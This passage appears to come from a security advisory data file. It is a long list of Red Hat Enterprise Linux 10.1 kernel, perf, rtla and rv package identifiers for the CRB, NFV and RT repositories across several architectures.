"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
